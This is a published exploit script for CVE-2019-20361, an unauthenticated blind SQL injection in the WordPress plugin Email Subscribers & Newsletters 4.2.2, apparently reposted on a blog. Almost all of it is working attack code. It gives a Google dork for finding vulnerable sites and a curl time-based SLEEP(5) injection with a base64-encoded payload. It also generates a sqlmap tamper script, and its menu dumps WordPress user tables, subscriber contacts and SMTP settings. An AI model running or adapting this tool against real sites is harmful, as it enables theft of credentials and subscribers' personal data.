WordPress Plugin Email Subscribers & Newsletters 4.2.2 – ‘hash’ SQL Injection (Unauthenticated) - 体验盒子

# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)

# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt

# Date: 2020-07-20

# Exploit Author: KBAZ@SOGETI_ESEC

# Vendor Homepage: https://www.icegram.com/email-subscribers/

# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2

# Version: < 4.3.3

# Tested on: Email Subscribers & Newsletters 4.2.2

# CVE : CVE-2019-20361

# Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361

main () {

header

if [ "$#" -ne 1 ]; then

echo "Usage : bash CVE-2019-20361.sh [BASE URL]"

echo "Example : bash CVE-2019-20361.sh http://127.0.0.1/"

exit

fi

url=$1

echo ' Target URL : ' "$url"

echo ' Generating sqlmap tamper script in /tmp'

gen_sqlmap_tamper

sqlmap_cmd="sqlmap -u ${url}?es=open&hash=* --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3"

echo ' SQLMap base command : ' "$sqlmap_cmd"

while true

do

sleep 1

echo ''

echo " Possible choices: "

echo ''

echo "0) Exit"

echo "1) Simple vulnerability test SLEEP(5)"

echo "2) Vulnerability test with SQLMap "

echo "3) Get WP users data"

echo "4) Get subscribers information"

echo "5) Get 'Simple WP SMTP' settings"

echo ''

echo -n ' Choice number => '

read n

case $n in

0) exit ;;

1) echo 'Testing SLEEP(5)...'

{ time (curl -i -s -k ${url}'?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo -e "\033[0;31m" ' [+] Vulnerable' "\033[0m" || echo ' [-] Not vulnerable' ;;

2) $sqlmap_cmd ;;

3) $sqlmap_cmd -T wp_users,wp_usermeta --dump ;;

4) $sqlmap_cmd -T wp_ig_contacts --dump ;;

5) $sqlmap_cmd --sql-query 'select * from wp_options where option_name="swpsmtp_options"' ;;

*) echo "Invalid option" ;;

esac

done

}

header () {

echo ''

echo ' ################################################################################################';

echo ' # ___ ___ ___ ______ #';

echo ' #/\\ /\\ /\\ /\\/\\___ #';

echo ' # /::\\ /::\\ /::\\ /::\\ \:\\/\\#';

echo ' #/:/\ \\ /:/\:\\ /:/\:\\ /:/\:\\ \:\\ \:\\ #';

echo ' # _\:\~\ \\ /:/\:\\ /:/\:\\ /::\~\:\\/::\\/::\__\#';

echo ' #/\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/#';

echo ' #\:\ \:\ \/__\:\\ /:/\:\/\ \/__\:\~\:\ \/__/:/\/__/\/:// #';

echo ' # \:\ \:\__\\:\/:// \:\ \:\__\\:\ \:\__\/://\::/__/#';

echo ' #\:\/:// \:\/:// \:\/:// \:\ \/__/\/__/\:\__\#';

echo ' # \::// \::// \::// \:\__\\/__/#';

echo ' #\/__/ \/__/ \/__/ \/__/ #';

echo ' # ___ ___ ___ ___#';

echo ' #/\\ /\\ /\\ /\\ #';

echo ' # /::\\ /::\\ /::\\ /::\\#';

echo ' #EXPLOIT /:/\:\\ /:/\ \\ /:/\:\\ /:/\:\\ #';

echo ' # Email Subscribers & Newsletters < 4.3.1 /::\~\:\\ _\:\~\ \\ /::\~\:\\ /:/\:\\#';

echo ' # Unauthenticated Blind SQL Injection/:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #';

echo ' #\:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\\\/__/ #';

echo ' # \:\ \:\__\\:\ \:\__\\:\ \:\__\\:\\ #';

echo ' #\:\ \/__/ \:\/:// \:\ \/__/ \:\\#';

echo ' # \:\__\\::// \:\__\\:\__\ #';

echo ' #KBAZ\/__/ \/__/ \/__/ \/__/ #';

echo ' ##';

echo ' ################################################################################################';

echo ''

}

raw_commands () {

echo '{"message_id":"100","campaign_id":"100","contact_id":"' "100','100','100','3'),('1594999398','1594999398','1',(SELECT SLEEP(5)),'100','100','3'),('1594999398','1594999398','1','100"'","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' |base64 -w 0

{ time (curl -i -s -k 'http://127.0.0.1/?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo '[+] Vulnerable' || echo '[-] Not vulnerable'

sqlmap -u 'http://127.0.0.1/?es=open&hash=*' --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3

-T wp_users,wp_usermeta --dump

-T wp_ig_contacts --dump

--sql-query 'select * from wp_options where option_name="swpsmtp_options"'

}

gen_sqlmap_tamper () {

touch /tmp/__init__.py

cat << _END > /tmp/tamper_CVE-2019-1356989.py

#!/usr/bin/env python

import base64

import urllib

def tamper(payload, **kwargs):

#{"message_id":"100","campaign_id":"100","contact_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}

#INSERT INTO wp_ig_actions (created_at, updated_at, count, contact_id, message_id, campaign_id, type) VALUES ('1595001866','1595001866','1','100','100','100','3') ON DUPLICATE KEY UPDATE created_at = created_at, count = count+1, updated_at = '1595001866'

param= '{"contact_id":"'

param += "100','100','100','3'),('1594999398','1594999398','1',(1%s),'100','100','3'),('1594999398','1594999398','1','100"

param += '","campaign_id":"100","message_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}'

#print(param%payload)

return base64.encodestring( (param%payload).encode('utf-8') ).decode('utf-8').replace('\n', '')

_END

}

main $@